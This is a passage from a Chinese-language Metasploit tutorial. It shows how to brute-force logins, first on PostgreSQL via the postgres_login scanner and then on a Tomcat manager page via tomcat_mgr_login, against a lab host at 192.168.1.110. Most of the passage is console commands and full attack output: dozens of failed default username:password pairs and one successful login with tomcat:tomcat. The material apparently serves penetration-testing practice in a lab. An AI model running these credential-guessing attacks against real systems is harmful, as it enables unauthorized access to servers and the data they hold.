这里只需要设置目标PostgreSQL的ip地址,USER_FILE和PASS_FILE使用默认进行测试,当然实际环境需要用自己的字典文件。
msf auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.1.110 rhosts => 192.168.1.110 |
如图所示:
Tomcat 演示流程
Tomcat管理后台http://ip:port/manager/html爆破,不多说。
msf > use auxiliary/scanner/http/tomcat_mgr_login msf auxiliary(scanner/http/tomcat_mgr_login) > show options ... msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.1.110 rhosts => 192.168.1.110 msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180 rport => 8180 |
需要设置两个重要选项:ip和port, 当然可以也提供自己的密码字典。
破解过程如下所示:
msf auxiliary(scanner/http/tomcat_mgr_login) > exploit [-] 192.168.1.110:8180 - LOGIN FAILED: admin:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:root (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:tomcat (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:s3cret (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:root (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:tomcat (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:s3cret (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: manager:vagrant (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:root (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:tomcat (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:s3cret (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: role1:vagrant (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:root (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:tomcat (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:s3cret (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:vagrant (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: tomcat:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: tomcat:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: tomcat:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: tomcat:root (Incorrect) [+] 192.168.1.110:8180 - Login Successful: tomcat:tomcat [-] 192.168.1.110:8180 - LOGIN FAILED: both:admin (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:manager (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:role1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:root (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:tomcat (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:s3cret (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: both:vagrant (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: root:owaspbwa (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: xampp:xampp (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect) [-] 192.168.1.110:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
注意,其中有一行显示破解成功。
[+] 192.168.1.110:8180 - Login Successful: tomcat:tomcat |
简单演示到这....